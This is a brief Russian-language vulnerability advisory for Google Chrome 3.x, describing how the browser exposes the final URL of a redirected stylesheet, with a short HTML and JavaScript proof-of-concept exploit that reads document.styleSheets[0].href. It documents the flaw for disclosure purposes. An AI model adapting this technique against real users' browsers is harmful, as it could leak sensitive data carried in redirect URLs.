Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: Google Chrome 3.x
Уязвимость позволяет удаленному злоумышленнику получить несанкционированный
доступ к конфиденциальной информации на целевой системе. Уязвимость существует
из-за того, что приложение следует перенаправлению стилей страниц и позволяет
прочитать целевой URL. Атакующий может использовать сайты, использующие
перенаправления в URL содержащие конфиденциальную информацию, что позволит
получить доступ к этим данным.
Эксплоит:
<link rel="stylesheet" type="text/css" href="http://www.yahoo.com">
Hola
<script language="javascript">
setTimeout("alert(document.styleSheets[0].href)", 10000);
//setTimeout is used just to wait for page loading
</script>